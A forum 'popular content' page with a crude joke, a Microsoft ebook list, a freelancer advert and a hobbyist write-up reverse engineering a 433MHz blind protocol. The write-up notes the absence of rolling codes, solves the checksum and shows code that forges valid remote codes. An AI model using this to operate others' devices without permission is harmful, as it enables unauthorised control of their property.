Leaderboard
Popular Content
Showing content with the highest reputation on 07/17/17 in all areas
-
Angelico, if these guys touch a woman's backside they don't wash for 6 months, believing they have been blessed, then they go out to their buddies in the neighbourhood and charge them 5 lei each to touch them. Hahahhahaha
2 points
Category Title Format Azure Introducing Windows Azure™ for IT Professionals PDF MOBI EPUB Azure Microsoft Azure Essentials Azure Automation PDF MOBI EPUB Azure Microsoft Azure Essentials Azure Machine Learning PDF MOBI EPUB Azure Microsoft Azure Essentials Fundamentals of Azure PDF MOBI EPUB Azure Microsoft Azure Essentials Fundamentals of Azure, Second Edition PDF Azure Microsoft Azure Essentials Fundamentals of Azure, Second Edition Mobile PDF Azure Microsoft Azure Essentials Migrating SQL Server Databases to Azure – Mobile PDF Azure Microsoft Azure Essentials Migrating SQL Server Databases to Azure 8.5X11 PDF Azure Microsoft Azure ExpressRoute Guide PDF Azure Overview of Azure Active Directory DOC Azure Rapid Deployment Guide For Azure Rights Management PDF Azure Rethinking Enterprise Storage: A Hybrid Cloud Model PDF MOBI EPUB BizTalk BizTalk Server 2016 Licensing Datasheet PDF BizTalk BizTalk Server 2016 Management Pack Guide DOC Cloud Enterprise Cloud Strategy PDF MOBI EPUB Cloud Enterprise Cloud Strategy – Mobile PDF Developer .NET Microservices: Architecture for Containerized .NET Applications PDF Developer .NET Technology Guidance for Business Applications PDF Developer Building Cloud Apps with Microsoft Azure™: Best practices for DevOps, data storage, high availability, and more PDF MOBI EPUB Developer Containerized Docker Application Lifecycle with Microsoft Platform and Tools PDF Developer Creating Mobile Apps with Xamarin.Forms, Preview Edition 2 PDF MOBI EPUB Developer Creating Mobile Apps with Xamarin.Forms: Cross-platform C# programming for iOS, Android, and Windows PDF MOBI EPUB Developer Managing Agile Open-Source Software Projects with Microsoft Visual Studio Online PDF MOBI EPUB Developer Microsoft Azure Essentials Azure Web Apps for Developers PDF MOBI EPUB Developer Microsoft Platform and Tools for Mobile App Development PDF Developer Microsoft Platform and Tools for Mobile App Development – Mobile PDF Developer Moving to Microsoft® Visual 
Studio® 2010 XPS PDF MOBI EPUB Developer Programming Windows 8 Apps with HTML, CSS, and JavaScript PDF MOBI EPUB Developer Programming Windows Store Apps with HTML, CSS, and JavaScript, Second Edition PDF MOBI EPUB Developer Programming Windows® Phone 7 (Special Excerpt 2) XPS PDF Developer Team Foundation Server to Visual Studio Team Services Migration Guide PDF Dynamics 5 cool things you can do with CRM for tablets PDF Dynamics Create Custom Analytics in Dynamics 365 with Power BI PDF Dynamics Create of Customize System Dashboards PDF Dynamics Create Your First CRM Marketing Campaign PDF Dynamics CRM Basics for Outlook basics PDF Dynamics CRM Basics for Sales Pros and Service Reps PDF Dynamics Give Great Customer Service with CRM PDF Dynamics Go Mobile with CRM for Phones – Express PDF Dynamics Go Mobile with CRM for Tablets PDF Dynamics Import Contacts into CRM PDF Dynamics Introducing Microsoft Social Engagement PDF Dynamics Introduction to Business Processes PDF Dynamics Meet Your Service Goals with SLAs and Entitlements PDF Dynamics Microsoft Dynamics CRM 2016 Interactive Service Hub User Guide PDF Dynamics Microsoft Dynamics CRM 2016 On-Premises Volume Licensing and Pricing Guide PDF Dynamics Microsoft Dynamics CRM for Outlook Installing Guide for use with Microsoft Dynamics CRM Online PDF Dynamics Microsoft Dynamics CRM Resource Guide 2015 PDF Dynamics Microsoft Social Engagement for CRM PDF Dynamics Product Overview and Capability Guide Microsoft Dynamics NAV 2016 PDF Dynamics RAP as a Service for Dynamics CRM PDF Dynamics Set Up A Social Engagement Search For Your Product PDF Dynamics Social is for Closers PDF Dynamics Start Working in CRM PDF Dynamics Your Brand Sux PDF General 10 essential tips and tools for mobile working PDF General An employee’s guide to healthy computing PDF General Guide for People who have Language or Communication Disabilities DOC General Guide for People who have Learning Disabilities DOC Licensing Introduction to Per Core 
Licensing and Basic Definitions PDF Licensing Licensing Windows and Microsoft Office for use on the Macintosh PDF Licensing VLSC Software Assurance Guide PDF Licensing Windows Server 2016 and System Center 2016 Pricing and Licensing FAQs PDF Office Access 2013 Keyboard Shortcuts PDF Office Azure AD/Office 365 seamless sign-in PDF Office Content Encryption in Microsoft Office 365 PDF Office Controlling Access to Office 365 and Protecting Content on Devices PDF Office Customize Word 2013 Keyboard Shortcuts PDF Office Data Resiliency in Microsoft Office 365 PDF Office Excel 2013 Keyboard Shortcuts PDF Office Excel 2016 keyboard shortcuts and function keys DOC Office Excel Online Keyboard Shortcuts PDF Office File Protection Solutions in Office 365 PDF Office First Look: Microsoft® Office 2010 XPS PDF Office Get Started With Microsoft OneDrive PDF Office Get Started With Microsoft Project Online PDF Office Getting started with MyAnalytics DOC Office How To Recover That Un-Saved Office Document PDF Office InfoPath 2013 Keyboard Shortcuts PDF Office Keyboard shortcuts for Microsoft Outlook 2013 and 2016 DOC Office Keyboard shortcuts for Microsoft Word 2016 for Windows DOC Office Licensing Microsoft Office 365 ProPlus Subscription Service in Volume Licensing PDF Office Licensing Microsoft Office software in Volume Licensing PDF Office Microsoft Access 2013 Quick Start Guide PDF Office Microsoft Classroom Deployment PDF Office Microsoft Excel 2013 Quick Start Guide PDF Office Microsoft Excel 2016 for Mac Quick Start Guide PDF Office Microsoft Excel 2016 Quick Start Guide PDF Office Microsoft Excel Mobile Quick Start Guide PDF Office Microsoft Excel VLOOKUP Troubleshooting Tips PDF Office Microsoft OneNote 2013 Quick Start Guide PDF Office Microsoft OneNote 2016 for Mac Quick Start Guide PDF Office Microsoft OneNote 2016 Quick Start Guide PDF Office Microsoft OneNote 2016 Tips and Tricks PDF Office Microsoft OneNote Mobile Quick Start Guide PDF Office Microsoft Outlook 2013 
Quick Start Guide PDF Office Microsoft Outlook 2016 for Mac Quick Start Guide PDF Office Microsoft Outlook 2016 Quick Start Guide PDF Office Microsoft Outlook 2016 Tips and Tricks PDF Office Microsoft Powerpoint 2013 Quick Start Guide PDF Office Microsoft PowerPoint 2016 for Mac Quick Start Guide PDF Office Microsoft PowerPoint 2016 for Mac Quick Start Guide PDF Office Microsoft PowerPoint Mobile Quick Start Guide PDF Office Microsoft Project 2013 Quick Start Guide PDF Office Microsoft Publisher 2013 Quick Start Guide PDF Office Microsoft Visio 2013 Quick Start Guide PDF Office Microsoft Word 2013 Quick Start Guide PDF Office Microsoft Word 2016 for Mac Quick Start Guide PDF Office Microsoft Word 2016 Quick Start Guide PDF Office Microsoft Word Mobile Quick Start Guide PDF Office Microsoft® Office 365: Connect and Collaborate Virtually Anywhere, Anytime PDF Office Monitoring and protecting sensitive data in Office 365 DOC Office Office 365 Dedicated Platform vNext Service Release PDF Office Office 365 Licensing Brief PDF Office OneNote 2013 Keyboard Shortcuts PDF Office OneNote Online Keyboard Shortcuts PDF Office Outlook 2013 Keyboard Shortcuts PDF Office Outlook Web App Keyboard Shortcuts PDF Office Own Your Future: Update Your Skills with Resources and Career Ideas from Microsoft® XPS PDF MOBI EPUB Office PowerPoint Online Keyboard Shortcuts PDF Office Project 2013 Keyboard Shortcuts PDF Office Publisher 2013 Keyboard Shortcuts PDF Office Security and Privacy For Microsoft Office 2010 Users PDF MOBI EPUB Office Security Incident Management in Microsoft Office 365 PDF PDF Office SharePoint Online Dedicated & OneDrive for Business Dedicated vNext Service Release PDF Office Skype for Business User Tips & Tricks for Anyone PDF Office Switching from Google Apps to Office 365 for business PDF Office Tenant Isolation in Microsoft Office 365 PDF Office Visio 2013 Keyboard Shortcuts PDF Office Windows 10 Tips and Tricks PDF Office Word 2013 Keyboard Shortcuts PDF Office 
Word Online Keyboard Shortcuts PDF Office Working with SmartArt Graphics Keyboard Shortcuts PDF Power BI Ask, find, and act—harnessing the power of Cortana and Power BI DOC Power BI Bidirectional cross-filtering in SQL Server Analysis Services 2016 and Power BI Desktop DOC Power BI Configuring Power BI mobile apps with Microsoft Intune DOC Power BI Getting started with the Power BI for Android app DOC Power BI Getting Started with the Power BI for iOS app DOC Power BI How to plan capacity for embedded analytics with Power BI Premium PDF Power BI Introducing Microsoft Power BI PDF Power BI Introducing Microsoft Power BI – Mobile PDF Power BI Microsoft Power BI Premium Whitepaper PDF Power BI Power BI mobile apps—enabling data analytics on the go DOC Power BI Propelling digital transformation in manufacturing operations with Power BI DOC Power BI Using Power BI to visualize data insights from Microsoft Dynamics CRM Online DOC PowerShell Microsoft Dynamics GP 2015 R2 PowerShell Users Guide PDF PowerShell PowerShell Integrated Scripting Environment 3.0 PDF PowerShell Simplify Group Policy administration with Windows PowerShell PDF PowerShell Windows PowerShell 3.0 Examples PDF PowerShell Windows PowerShell 3.0 Language Quick Reference PDF PowerShell WINDOWS POWERSHELL 4.0 LANGUAGE QUICK REFERENCE PDF PowerShell Windows PowerShell 4.0 Language Reference Examples PDF PowerShell Windows PowerShell Command Builder User’s Guide PDF PowerShell Windows PowerShell Desired State Configuration Quick Reference PDF PowerShell WINDOWS POWERSHELL INTEGRATED SCRIPTING ENVIRONMENT 4.0 PDF PowerShell Windows PowerShell Web Access PDF PowerShell WMI in PowerShell 3.0 PDF PowerShell WMI in Windows PowerShell 4.0 PDF SharePoint Configuring Microsoft SharePoint Hybrid Capabilities PDF SharePoint Configuring Microsoft SharePoint Hybrid Capabilities – Mobile PDF SharePoint Deployment guide for Microsoft SharePoint 2013 PDF SharePoint Microsoft SharePoint Server 2016 Architectural Models PDF 
SharePoint Planning and Preparing for Microsoft SharePoint Hybrid – 8.5 X 11 PDF SharePoint Planning and Preparing for Microsoft SharePoint Hybrid – Mobile PDF SharePoint RAP as a Service for SharePoint Server PDF SharePoint SharePoint Online Dedicated Service Description PDF SharePoint SharePoint Products Keyboard Shortcuts PDF SharePoint SharePoint Server 2016 Databases – Quick Reference Guide PDF SharePoint SharePoint Server 2016 Quick Start Guide PDF SQL Server 5 Tips For A Smooth SSIS Upgrade to SQL Server 2012 PDF SQL Server Backup and Restore of SQL Server Databases PDF SQL Server Data Science with Microsoft SQL Server 2016 PDF SQL Server Deeper insights across data with SQL Server 2016 – Technical White Paper PDF SQL Server Deploying SQL Server 2016 PowerPivot and Power View in a Multi-Tier SharePoint 2016 Farm DOC SQL Server Deploying SQL Server 2016 PowerPivot and Power View in SharePoint 2016 DOC SQL Server Guide to Migrating from Oracle to SQL Server 2014 and Azure SQL Database PDF SQL Server Introducing Microsoft Azure™ HDInsight™ PDF MOBI EPUB SQL Server Introducing Microsoft Data Warehouse Fast Track for SQL Server 2016 PDF SQL Server Introducing Microsoft SQL Server 2012 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2014 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2016: Mission-Critical Applications, Deeper Insights, Hyperscale Cloud, Preview 2 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2016: Mission-Critical Applications, Deeper Insights, Hyperscale Cloud, Preview 2 – Mobile PDF SQL Server Introducing Microsoft Technologies for Data Storage, Movement and Transformation DOC SQL Server Introducing Microsoft® SQL Server® 2008 R2 XPS PDF MOBI EPUB SQL Server Microsoft SharePoint Server 2016 Reviewer’s Guide PDF SQL Server Microsoft SQL Server 2012 Tutorials: Analysis Services – Data Mining Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Analysis Services – Multidimensional Modeling Step-by-Step 
PDF SQL Server Microsoft SQL Server 2012 Tutorials: Reporting Services Quick Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Writing Transact-SQL-Statements PDF SQL Server Microsoft SQL Server 2014 Licensing Guide PDF SQL Server Microsoft SQL Server 2016 Licensing Datasheet PDF SQL Server Microsoft SQL Server 2016 Licensing Guide PDF SQL Server Microsoft SQL Server 2016 Mission-Critical Performance Technical White Paper PDF SQL Server Microsoft SQL Server 2016 New Innovations PDF SQL Server Microsoft SQL Server 2016 SP1 Editions PDF SQL Server Microsoft SQL Server In-Memory OLTP and Columnstore Feature Comparison PDF SQL Server RAP as a Service for SQL Server PDF SQL Server SQLCAT’s Guide to: Relational Engine PDF SQL Server Xquery Language Reference PDF Surface Surface Book User Guide PDF Surface Surface Pro 4 User Guide PDF System Center Guide to Microsoft System Center Management Pack for SQL Server 2016 Reporting Services (Native Mode) DOC System Center Guide to System Center Management Pack for Windows Print Server 2016 DOC System Center Introducing Microsoft System Center 2012 R2 PDF MOBI EPUB System Center Microsoft System Center Building a Virtualized Network Solution, Second Edition PDF MOBI EPUB System Center Microsoft System Center Data Protection for the Hybrid Cloud PDF MOBI EPUB System Center Microsoft System Center Deploying Hyper-V with Software-Defined Storage & Networking PDF MOBI EPUB System Center Microsoft System Center Extending Operations Manager Reporting PDF MOBI EPUB System Center Microsoft System Center Introduction to Microsoft Automation Solutions PDF MOBI EPUB System Center Microsoft System Center Operations Manager Field Experience PDF MOBI EPUB System Center Microsoft System Center Software Update Management Field Experience PDF MOBI EPUB System Center Microsoft System Center: Building a Virtualized Network Solution PDF MOBI EPUB System Center Microsoft System Center: Cloud Management with App Controller PDF MOBI 
EPUB System Center Microsoft System Center: Configuration Manager Field Experience PDF MOBI EPUB System Center Microsoft System Center: Designing Orchestrator Runbooks PDF MOBI EPUB System Center Microsoft System Center: Integrated Cloud Platform PDF MOBI EPUB System Center Microsoft System Center: Network Virtualization and Cloud Computing PDF MOBI EPUB System Center Microsoft System Center: Optimizing Service Manager PDF MOBI EPUB System Center Microsoft System Center: Troubleshooting Configuration Manager PDF MOBI EPUB System Center What’s new in System Center 2016 White Paper PDF Virtualization Understanding Microsoft Virtualizaton R2 Solutions XPS PDF Windows Client Deploying Windows 10: Automating deployment by using System Center Configuration Manager PDF MOBI EPUB Windows Client Deploying Windows 10: Automating deployment by using System Center Configuration Manager – Mobile PDF Windows Client Getting the most out of Microsoft Edge DOC Windows Client Introducing Windows 10 for IT Professionals PDF MOBI EPUB Windows Client Introducing Windows 10 for IT Professionals, Preview Edition PDF MOBI EPUB Windows Client Introducing Windows 8.1 for IT Professionals PDF MOBI EPUB Windows Client Introducing Windows 8: An Overview for IT Professionals PDF MOBI EPUB Windows Client Licensing Windows desktop operating system for use with virtual machines PDF Windows Client Protecting your data with Windows 10 BitLocker DOC Windows Client RAP as a Service for Windows Desktop PDF Windows Client Shortcut Keys for Windows 10 DOC Windows Client Use Reset to restore your Windows 10 PC DOC Windows Client Volume Licensing Reference Guide Windows 10 Desktop Operating System PDF Windows Client Windows 10 IT Pro Essentials Support Secrets PDF PDF MOBI EPUB Windows Client Windows 10 IT Pro Essentials Top 10 Tools PDF MOBI EPUB Windows Client Windows 10 IT Pro Essentials Top 10 Tools – Mobile PDF Windows Client Work Smart: Windows 8 Shortcut Keys PDF Windows Server Automating Windows 
Server 2016 configuration with PowerShell and DSC DOC Windows Server Introducing Windows Server 2008 R2 XPS PDF MOBI EPUB Windows Server Introducing Windows Server 2012 PDF MOBI MOBI EPUB EPUB Windows Server Introducing Windows Server 2012 R2 PDF MOBI EPUB Windows Server Introducing Windows Server 2016 PDF Windows Server Introducing Windows Server 2016 – Mobile PDF Windows Server Introducing Windows Server 2016 Technical Preview PDF Windows Server Introducing Windows Server 2016 Technical Preview – Mobile PDF Windows Server Introducing Windows Server® 2012 R2 Preview Release PDF MOBI EPUB Windows Server Offline Assessment for Active Directory PDF Windows Server RAP as a Service for Active Directory PDF Windows Server RAP as a Service for Failover Cluster PDF Windows Server RAP as a Service for Internet Information Services PDF Windows Server RAP as a Service for Windows Server Hyper-V PDF Windows Server Windows Server 2016 Licensing PDF Source: https://blogs.msdn.microsoft.com/mssmallbiz/2017/07/11/largest-free-microsoft-ebook-giveaway-im-giving-away-millions-of-free-microsoft-ebooks-again-including-windows-10-office-365-office-2016-power-bi-azure-windows-8-1-office-2013-sharepo/ 2 points
-
Reverse Engineering a 433MHz Motorised Blind RF Protocol

I've been doing a fair bit of DIY home automation hacking lately across many different devices - mostly interested in adding DIY HomeKit integrations. A couple of months ago, my dad purchased a bulk order of RAEX 433MHz RF motorised blinds to install around the house, replacing our existing manual roller blinds. Note: These blinds are the same model sold at Spotlight under the name Motion Motorised Roller Blind. The blinds are a fantastic addition to the house, and allow me to be super lazy opening/closing my windows; however, in order to control them you need to purchase the RAEX brand remotes. RAEX manufacture many different types of remotes, of which I have access to two types, depicted below: R Type Remote (YRL2016) and X Type Remote (YR3144). Having a remote in every room of the house isn't feasible, since many channels would be unused on these remotes, and thus purchasing all the remotes would be a waste of $$$. Instead, multiple rooms are programmed onto the same remote. Unfortunately, due to this, remotes are highly contended for. An alternative solution to using the RAEX remotes is to use a piece of hardware called the RM Pro. This allows you to control the remotes via your smartphone using their app. The app is slow, buggy and, for me, doesn't fit well into the home-automation ecosystem. I want my roller blinds to be accessible via Apple HomeKit. In order to control these blinds, I knew I'd need to either: (1) reverse engineer how the RM Pro app communicated with the RM Pro and piggy-back onto this, or (2) reverse engineer the RF protocol the remotes used to communicate with the blinds. I attempted option 1 for a little while, but ruled it out as I was unable to intercept the traffic used to communicate between the iPhone and the hub. Therefore, I began my adventure to reverse engineer the RF protocol. I purchased a 433MHz transmitter/receiver pair for Arduino on eBay.
In case that link stops working, try searching eBay for "433Mhz RF transmitter receiver link kit for Arduino".

Initial Research

A handful of Google searches didn't yield many results for finding a technical specification of the protocol RAEX were using. I could not find any technical specification of the protocol via FCC or patent lookup. I emailed RM Pro to obtain a technical specification; they did not understand my English. I emailed RAEX to obtain a technical specification; they would not release it without a confidentiality agreement. I did find that RFXTRX was able to control the blind via their BlindsT4 mode, which appears to also work for Outlook Motion Blinds. After opening one of the remotes and identifying the micro-controllers in use, I was unable to find any documentation explaining a generic RF encoding scheme being used. It may have been possible to reverse engineer the firmware on a remote by taking an I2C dump of the ROM chip. It seems similar remotes allow dumping at any point after boot.

Capturing the data

Once my package had arrived I hooked up the receiver to an Arduino and began searching for an Arduino sketch that could capture the data being transmitted. I tried many things that all failed; however, I eventually found one that appeared to capture the data. Once I had captured what I deemed to be enough data, I began analysing it. It was really difficult to make any sense of this data, and I didn't even know if what had been captured was correct. I did some further reading and read a few RF reverse engineering write-ups. A lot of them experimented with the idea of using Audacity to capture the signal via the receiver plugged into the microphone port of the computer. I thought, why not, and began working on this. This captures a lot of data. I captured 4 different R type remotes, along with 2 different X type remotes, and to make things even more fun, 8 different device pairings from the Broadlink RM Pro (B type).
From this, I was able to determine a few things:
The transmissions did not have a rolling code. Therefore, I could simply replay captured signals and make the blind do the exact same thing each time. This would be the worst-case scenario if I could not reverse engineer the protocol.
The transmissions were repeated at least 3 times (this changed depending on the remote type being used).

Zooming into the waveform, we can see the different parts of a captured transmission. The example below is the capture of Remote 1, Channel 1, for the pairing action. Zooming in: in the zoomed image you can see that the transmission begins with an oscillating 0101 AGC pattern, followed by a further double-width preamble pattern, followed by a longer header pattern, and then by data. This preamble, header and data are repeated 3 times for R type remotes (the AGC pattern is only sent once at the beginning of the transmission). This can be seen in the first image. Looking at this data won't be too useful. I need a way to turn it digital, analyse the bits and determine some patterns between different remotes, channels and actions.

Decoding the waveform

We need to determine how the waveform is encoded. It's very common for these kinds of hardware applications to use one of the following: Manchester encoding; Tri-State/Tri-bit encoding; PWM encoding; Raw? (high long = 11, high short = 1, low long = 00, low short = 0?). By doing some research, I was able to determine that the encoding used was most likely Manchester encoding. Let's keep this in mind for later.

Digitising the data

I began processing the data as the raw scheme outlined above (even though I believed it was Manchester). The reason for this is that if it happened not to be Manchester, I could try to decode it again with another scheme. (Also, writing out raw by hand was easier than doing Manchester decoding in my head.) I wrote out each capture into a Google Sheets spreadsheet.
It took about 5 minutes to write out each action for each channel, and there were 6 channels per remote. I began to think this would take a while to actually get enough data to analyse (considering I had 160 captures to digitise). I stopped once I had collected all actions from 8 different channels across 2 remotes. This gave me 32 captures to play with. From this much data, I was able to infer a few things about the raw bits: some bits changed per channel; some bits changed per remote; some bits changed seemingly randomly for each channel/remote/action combination. Could this be some sort of checksum? I still needed more data, but I had way too many captures to decode by hand. In order to get anywhere with this, I needed a script to process the WAV files I captured via Audacity. I wrote a script that detected headers and extracted data as its raw encoding equivalent (as I had been doing by hand). This script produced output in JSON so I could add additional metadata and cross-check the captures with the waveform:

[
  {
    "filename": "/Users/nickw/Dropbox/RF_Blinds/Export_Audio2/tracks2/R1_CH1.wav",
    "captures": [
      { "data": "01100101100110011001100101101001011010010110011010011010101010101010101010011001101010101010101010101010101", "header_pos": 15751, "preamble_pos": 15071 },
      { "data": "01100101100110011001100101101001011010010110011010100110101010101001101010011001101010101010101010101010101", "header_pos": 46307, "preamble_pos": 45628 },
      { "data": "01100101100110011001100101101001011010010110011010010110101010101010011010011001101010101010101010101010101", "header_pos": 73514, "preamble_pos": 72836 },
      { "data": "01100101100110011001100101101001011010010110011010101010101010100101010101101001011010101010101010101010101", "header_pos": 103575, "preamble_pos": 102895 }
    ]
  }
]

Once verified, I tabulated this data and inserted it into my spreadsheet for further processing.
Unfortunately there were too many bits per capture to keep myself sane. I decided it would be best if I decoded this as Manchester. To do this, I wrote a script that processes the raw capture data into Manchester (or other encoding types). Migrating this data into my spreadsheet, it begins to make a lot more sense. Looking at this data we can immediately see some relationship between the bits and their purpose:
6 bits for channel (C).
2 bits for action (A).
6 bits for some checksum, which appears to be a function of action and channel, F(A, C): it changes when the action changes and when the channel changes. I cannot be certain it changes across remotes, since no channels are equal.
1 bit appears to be a function of Action, F(A).
1 bit appears to be a function of F(A), thus G(F(A)). It changes depending on F(A)'s value, sometimes a 1-1 mapping, sometimes an inverse mapping.

After some further investigation, I determined that for the same remote and channel, for each different action, F(A, C) increased by 1 (if you consider the bits to be big-endian). Looking a bit more into this, I also determined that for adjacent channels, the bits associated with C (Channel) count upwards/backwards (X type remotes count upwards, R type remotes count backwards). Additionally, F(C) also increases/decreases together. Pay attention to the C column. From this, I can confirm a relationship between F(A, C) and C, such that F(A, C) = F(PAIR, C0) == F(PAIR, C1) ± 1. After this discovery, I also determined that there's another mathematical relationship between F(A, C) and A (Action).

Making More Data

From the information we've now gathered, it seems plausible that we can create new remotes by changing the 6 bits of channel data and mutating the checksum accordingly, following the mathematical relationship we found above. This means we can generate 64 channels from a single seed channel.
This many channels is enough to control all the blinds in the house; however, I really wanted to fully decode the checksum field and in turn be able to generate an (almost) infinite number of remotes. I wrote a tool to output all channels for a seed capture:

./remote-gen generate 01000110110100100001010110111111111010101
...

My reasoning behind generating more data was that maybe we could determine how the checksum is formed if we could view different remotes on the same channel, i.e. R0CH0, R1CH0, X1CH0, etc. Essentially what I wanted to do was solve the following equation's function G: F(ACTION_PAIR, CH0) == G(F(ACTION_PAIR, CH0)). However, looking at all Channel 0's PAIR captures, the checksum still appeared to be totally jumbled/random. Whilst looking at this data, however, another pattern stands out: G(F(A)) sits an entire byte offset (8 bits) away from F(A). Additionally, the first 2 bits of F(A, C) sit at the byte boundary and also align with A (Action). As Action increases, so does F(A, C). Let's line up all the bits at their byte boundaries and see what prevails (colours denoting byte boundaries; aligned boundaries). From here, we need to determine some function that produces the known checksum based on the first 4 bytes. Initially I tried XOR across the bytes. Not so successful: the output appears random, and XOR'ing the output with the checksum does not produce a constant key. Therefore, I deduce the checksum isn't produced via XOR. How about mathematical addition? We've already seen some addition/subtraction relationship above. This appeared to be more promising - there was a constant difference between channels for identical type remotes. Could this constant be different across different type remotes because my generation program had a bug? Were we not wrapping the correct number of bits or using the wrong byte boundaries when mutating the channel or checksum? It turns out that this was the reason 😑.
Solving the Checksum

Looking at the original captures, and performing the same modulo additions, we determine the checksum is computed by adding the leading 4 bytes and adding 3. I can't determine why a 3 is used here, other than RAEX wanting to make decoding their checksum more difficult or to ensure a correct transmission pattern. I refactored my application to handle the boundaries we had just identified:

type RemoteCode struct {
    LeadingBit uint        // Single bit
    Channel    uint8
    Remote     uint16
    Action     BlindAction // defined below; carries the 8-bit action value
    Checksum   uint8
}

Looking at the data like this began to make more sense. It turns out that F(A) wasn't a function of A (Action); it was actually part of the action data being transmitted:

type BlindAction struct {
    Name  string
    Value uint8
}

var validActions = []BlindAction{
    {Value: 127, Name: "PAIR"},
    {Value: 252, Name: "DOWN"},
    {Value: 253, Name: "STOP"},
    {Value: 254, Name: "UP"},
}

Additionally, the fact there is a split between channel and remote probably isn't necessary. Instead this could just be an arbitrary 24-bit integer; however, it is easier to work with when split into an 8-bit int and a 16-bit int. Based on this, I can deduce that the protocol has room for 2^24 remotes (~16.7 million)! That's a lot of blinds! I formally write out the checksum function:

// Sum of the four leading bytes plus 3; uint8 arithmetic wraps modulo 256.
// The original's Remote.GetHigh()/GetLow() helpers are written here as the
// high and low bytes of the 16-bit Remote field.
func (r *RemoteCode) GuessChecksum() uint8 {
    return r.Channel + uint8(r.Remote>>8) + uint8(r.Remote) + r.Action.Value + 3
}

Additional Tooling

My remote-gen program was good for the purpose of generating codes using a seed remote (although incorrect due to wrapping issues); however, it now needed some additional functionality. I needed a way to extract information from the captures and verify that all their checksums align with our rule-set for generating checksums.
I wrote an info command:

./remote-gen info 00010001110001001101010111011111101010100 --validate
Channel: 196
Remote: 54673
Action: STOP
Checksum: 42
Guessed Checksum: 42

Running with --validate exits with an error if the guessed checksum != checksum. Running this across all of our captures proved that our checksum function was correct. Another piece of functionality the tool needed was the ability to generate arbitrary codes to create our own remotes:

./remote-gen create --channel=196 --remote=54654 --verbose
00010001101111110101010111111111010011001 Action: PAIR
00010001101111110101010110011111101101000 Action: DOWN
00010001101111110101010111011111111101000 Action: STOP
00010001101111110101010110111111100011000 Action: UP

I can now generate any remote I deem necessary using this tool.

Wrapping Up

There you have it, that's how I reverse engineered an unknown protocol. I plan to follow up this post with some additional home-automation oriented blog posts in the future. From here I'm going to need to build my transmitter to transmit my new, generated codes and build an interface into HomeKit for this via my homebridge program. You can view all the work related to this project in the nickw444/homekit/blindkit repo. Source 2 points
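As an added example (not the post's own remote-gen code), the following Go program decodes a 41-bit capture into the fields worked out above, checks the "four leading bytes plus 3" checksum rule, and regenerates the four action codes for a channel/remote pair. It assumes every field is transmitted least-significant bit first, which is the ordering that reproduces the sample values quoted in the post.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// RemoteCode uses the field layout worked out in the post: one leading bit,
// then channel (8 bits), remote (16), action (8) and checksum (8) = 41 bits.
type RemoteCode struct {
	LeadingBit uint8
	Channel    uint8
	Remote     uint16
	Action     uint8
	Checksum   uint8
}

// Action values quoted in the post.
var actionNames = map[uint8]string{127: "PAIR", 252: "DOWN", 253: "STOP", 254: "UP"}

// Assumption: each field is sent least-significant bit first. With that
// ordering the post's sample code decodes to channel 196 / remote 54673.
func bitsToUint(bits string) uint32 {
	var v uint32
	for i := 0; i < len(bits); i++ {
		if bits[i] == '1' {
			v |= uint32(1) << uint(i)
		}
	}
	return v
}

func uintToBits(v uint32, n int) string {
	var sb strings.Builder
	for i := 0; i < n; i++ {
		if v&(uint32(1)<<uint(i)) != 0 {
			sb.WriteByte('1')
		} else {
			sb.WriteByte('0')
		}
	}
	return sb.String()
}

// Parse splits a 41-character capture string into its fields.
func Parse(code string) (RemoteCode, error) {
	if len(code) != 41 || strings.Trim(code, "01") != "" {
		return RemoteCode{}, errors.New("expected a 41-character string of 0s and 1s")
	}
	field := func(start, n int) uint32 { return bitsToUint(code[start : start+n]) }
	return RemoteCode{
		LeadingBit: uint8(field(0, 1)),
		Channel:    uint8(field(1, 8)),
		Remote:     uint16(field(9, 16)),
		Action:     uint8(field(25, 8)),
		Checksum:   uint8(field(33, 8)),
	}, nil
}

// ExpectedChecksum is the rule the post arrived at: the four leading bytes
// summed with 3, modulo 256 (uint8 arithmetic wraps for us).
func (r RemoteCode) ExpectedChecksum() uint8 {
	return r.Channel + uint8(r.Remote>>8) + uint8(r.Remote) + r.Action + 3
}

// Valid reports whether the transmitted checksum matches the rule.
func (r RemoteCode) Valid() bool { return r.Checksum == r.ExpectedChecksum() }

// ActionName maps the action byte to its name, or "UNKNOWN".
func (r RemoteCode) ActionName() string {
	if n, ok := actionNames[r.Action]; ok {
		return n
	}
	return "UNKNOWN"
}

// Encode serialises the fields back into the 41-bit string.
func (r RemoteCode) Encode() string {
	return uintToBits(uint32(r.LeadingBit), 1) + uintToBits(uint32(r.Channel), 8) +
		uintToBits(uint32(r.Remote), 16) + uintToBits(uint32(r.Action), 8) +
		uintToBits(uint32(r.Checksum), 8)
}

// Create builds the four action codes for a channel/remote pair, like the
// post's "remote-gen create" command, keyed by action name.
func Create(channel uint8, remote uint16) map[string]RemoteCode {
	out := make(map[string]RemoteCode)
	for value, name := range actionNames {
		r := RemoteCode{Channel: channel, Remote: remote, Action: value}
		r.Checksum = r.ExpectedChecksum()
		out[name] = r
	}
	return out
}

func main() {
	// Sample code quoted in the post's "info" example.
	r, err := Parse("00010001110001001101010111011111101010100")
	if err != nil {
		panic(err)
	}
	fmt.Printf("Channel: %d Remote: %d Action: %s Checksum: %d Valid: %v\n",
		r.Channel, r.Remote, r.ActionName(), r.Checksum, r.Valid())
	for name, c := range Create(196, 54654) {
		fmt.Println(c.Encode(), "Action:", name)
	}
}
```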
-
Web Development. Web languages: PHP, JavaScript. Design: Bootstrap. Template engine: Smarty. Editing/Fixing/Optimisation: WordPress. Scraper framework: Simple HTML DOM. Information: - I accept both long-term and short-term projects. - For any project, all the details are settled with the client at the start; no new features can be added during the project (only small changes). - Support is entirely FREE. By support I mean: installation, bug fixing, MySQL fixes, etc. - Prices are set according to the time the project requires and its complexity. - I also accept jobs with a monthly salary. - I also accept jobs where I am paid by the hour. Portfolio: - I offer live previews of projects in private or via TeamViewer (I am not allowed to share the companies' links, but I can show pictures). Payment: - Bitcoin/Ethereum - PayPal - Bank transfer - Paysafe. Contact: - ICQ: CURRENTLY UNAVAILABLE - Telegram: @adicode - Skype: adicode32@outlook.com - Jabber: adicode@404.city **Please don't leave messages like "I added you", "how much would it cost?", "can you do this?" in the topic. I welcome any question via PM or on one of the networks above. Thank you. 1 point
-
